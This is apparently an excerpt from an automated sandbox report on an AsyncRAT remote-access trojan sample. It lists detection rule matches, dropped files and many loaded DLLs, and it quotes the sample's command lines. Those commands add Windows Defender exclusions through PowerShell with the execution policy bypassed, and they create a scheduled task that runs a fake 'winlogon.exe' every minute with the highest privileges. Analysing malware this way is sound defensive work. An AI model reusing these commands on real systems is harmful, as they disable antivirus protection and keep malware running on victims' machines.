              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeCode function: 0_2_00007FF848E6A4420_2_00007FF848E6A442
              Source: C:\ProgramData\winlogon.exeCode function: 15_2_00007FF848E90EFA15_2_00007FF848E90EFA
              Source: C:\ProgramData\winlogon.exeCode function: 16_2_00007FF848E80EFA16_2_00007FF848E80EFA
              Source: 1bE8S5sN9S.exe, 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exel% vs 1bE8S5sN9S.exe
              Source: 1bE8S5sN9S.exeBinary or memory string: OriginalFilenameXClient.exel% vs 1bE8S5sN9S.exe
              Source: 1bE8S5sN9S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1bE8S5sN9S.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.1bE8S5sN9S.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.2078758497.0000000000202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\ProgramData\winlogon.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 1bE8S5sN9S.exe, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1bE8S5sN9S.exe, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1bE8S5sN9S.exe, JmdMVLiUq8Me.csCryptographic APIs: 'TransformFinalBlock'
              Source: winlogon.exe.0.dr, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csCryptographic APIs: 'TransformFinalBlock'
              Source: winlogon.exe.0.dr, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csCryptographic APIs: 'TransformFinalBlock'
              Source: winlogon.exe.0.dr, JmdMVLiUq8Me.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1bE8S5sN9S.exe, x9bkUzIMu7sa.csBase64 encoded string: 'NwJYEp3dOS+CU/AC11P420gTYNiaJvm7iZ4TaVGPhrZNbGQfhXboGwQzyXs14CTH', 'Qx5ZxBsJIg9rR49PkyvvGemC6rq3HD6yJs4PiqsAysMicg33aO/7HO8z2zoiXlIQ'
              Source: winlogon.exe.0.dr, x9bkUzIMu7sa.csBase64 encoded string: 'NwJYEp3dOS+CU/AC11P420gTYNiaJvm7iZ4TaVGPhrZNbGQfhXboGwQzyXs14CTH', 'Qx5ZxBsJIg9rR49PkyvvGemC6rq3HD6yJs4PiqsAysMicg33aO/7HO8z2zoiXlIQ'
              Source: 1bE8S5sN9S.exe, KkC8m6bEtyr7.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 1bE8S5sN9S.exe, KkC8m6bEtyr7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: winlogon.exe.0.dr, KkC8m6bEtyr7.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: winlogon.exe.0.dr, KkC8m6bEtyr7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@18/19@1/2
              Source: C:\ProgramData\winlogon.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log
              Source: C:\ProgramData\winlogon.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeMutant created: \Sessions\1\BaseNamedObjects\mGLiF8Fm9fxEDbqm
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febcydls.ud2.ps1Jump to behavior
              Source: 1bE8S5sN9S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 1bE8S5sN9S.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 1bE8S5sN9S.exeReversingLabs: Detection: 81%
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile read: C:\Users\user\Desktop\1bE8S5sN9S.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\1bE8S5sN9S.exe "C:\Users\user\Desktop\1bE8S5sN9S.exe"
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1bE8S5sN9S.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\winlogon.exe C:\ProgramData\winlogon.exe
              Source: unknownProcess created: C:\ProgramData\winlogon.exe C:\ProgramData\winlogon.exe
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1bE8S5sN9S.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1bE8S5sN9S.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"Jump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
